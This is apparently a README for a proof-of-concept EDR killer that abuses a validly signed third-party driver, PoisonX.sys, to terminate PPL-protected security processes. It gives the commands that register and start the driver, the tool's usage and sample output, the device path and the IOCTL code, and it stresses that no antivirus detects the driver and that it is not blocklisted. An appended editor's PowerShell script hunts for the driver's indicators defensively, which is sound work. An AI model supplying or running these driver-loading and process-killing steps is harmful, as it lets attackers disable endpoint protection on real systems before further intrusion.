Yet another POC for a kernel-mode process killer discovered during BYOVD research. It loads a third-party driver (PoisonX.sys) that carries a valid Microsoft Windows Hardware Compatibility Publisher signature and exposes an IOCTL interface capable of terminating any process, including PPL-protected EDR services such as CrowdStrike Falcon. PPL is enforced by the kernel against user-mode callers, so a driver running in ring 0 is not bound by it.
0/71 detections on VirusTotal at the time of the check. The signature is valid, and the driver is not on the Microsoft vulnerable driver blocklist.
Discovered by @j3h4ck
Full reverse engineering writeup, IDA analysis, and driver internals: Reverse Engineering a 0day used Against CrowdStrike EDR
Open a command prompt as Administrator and run:

```
sc create PoisonX type= kernel binPath= C:\full\path\to\PoisonX.sys
sc start PoisonX
```

To stop and remove it:

```
sc stop PoisonX
sc delete PoisonX
```

Usage:

```
PoisonKiller.exe <PID>
```

Example:

```
PoisonKiller.exe 5140
[*] Target PID: 5140
[+] Device opened
[*] Sending kill command...
[*] Driver response: ok
[+] Process terminated
```

| Property | Value |
|---|---|
| Device path | \\.\{F8284233-48F4-4680-ADDD-F8284233} |
| IOCTL | 0x22E010 |
| Signer | Microsoft Windows Hardware Compatibility Publisher |
| Sign date | 2025-03-25 |
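A defender-side check for the indicators this README publishes, added here by the editor and not part of the PoisonX tool or the write-up. It assumes the service name, image file name and signer string are used unchanged (all three are trivially renamed by an operator) and that System-log event 7045 recording is intact. It does not open the device or send the IOCTL; it only inspects registered driver services, their Authenticode signatures, and the service-install events that `sc create` leaves behind.

```powershell
# Added example (not part of the PoisonX repository): hunt a host for the names and
# signer string this README exposes. Assumed unchanged by the operator: service name,
# image file name, signer. A clean result means "these names are absent", nothing more.

$ServiceName = 'PoisonX'
$ImageName   = 'PoisonX.sys'
$Signer      = 'Microsoft Windows Hardware Compatibility Publisher'

function Resolve-DriverImagePath {
    # Win32_SystemDriver.PathName arrives in NT form (\??\C:\..., \SystemRoot\...),
    # as a bare system32-relative path, or already as a Win32 path.
    param([string]$PathName)
    if (-not $PathName) { return $null }
    $p = $PathName -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot
    if ($p -notmatch '^[A-Za-z]:\\') { $p = Join-Path $env:SystemRoot $p }
    return $p
}

function Find-PoisonXIndicators {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Driver services: match on the README's service name OR on the image file name,
    #    because the same .sys can be registered under any service name.
    foreach ($drv in Get-CimInstance Win32_SystemDriver) {
        $img  = Resolve-DriverImagePath $drv.PathName
        $leaf = if ($img) { [IO.Path]::GetFileName($img) } else { '' }
        if ($drv.Name -ieq $ServiceName -or $leaf -ieq $ImageName) {
            $findings.Add("Driver service '$($drv.Name)' state=$($drv.State) started=$($drv.Started) image=$img")
            if ($img -and (Test-Path -LiteralPath $img)) {
                # The README's signer is the WHCP attestation publisher: Microsoft signed
                # the binary, Microsoft did not write it. Record status and subject for triage.
                $sig     = Get-AuthenticodeSignature -FilePath $img
                $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
                $findings.Add("  Authenticode: $($sig.Status); subject=$subject")
                if ($subject -like "*$Signer*") {
                    $findings.Add("  Signer matches the WHCP publisher string from the README")
                }
            } else {
                $findings.Add("  Image missing on disk; the service registration outlived the file")
            }
        }
    }

    # 2. Service-install events. 'sc create ... type= kernel' produces System log event
    #    7045 (Service Control Manager) carrying the service name and image path. The
    #    entry survives 'sc delete', which removes the service but not the log record.
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        if ($e.Message -match [regex]::Escape($ServiceName) -or $e.Message -match [regex]::Escape($ImageName)) {
            $svc = if ($e.Message -match 'Service Name:\s*(.+)') { $Matches[1].Trim() } else { '?' }
            $findings.Add("Event 7045 at $($e.TimeCreated): service '$svc' installed")
        }
    }

    return $findings
}

$result = Find-PoisonXIndicators
if ($result.Count -eq 0) {
    'No PoisonX indicators found (name-based check only).'
} else {
    $result
}
```

Run it from an elevated PowerShell so every driver's image path is readable. The README gives no file hash or certificate thumbprint, so the check keys only on names and the signer string; the WHCP publisher string is shared by a very large number of legitimate drivers and is not an indicator on its own. If you hold the sample, add its SHA-256 (or, better, the driver's Authenticode hash) to the comparison, since that is the only rename-resistant indicator available, and consider a WDAC or HVCI block rule on it rather than waiting for the Microsoft blocklist to catch up.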
For educational and research purposes only.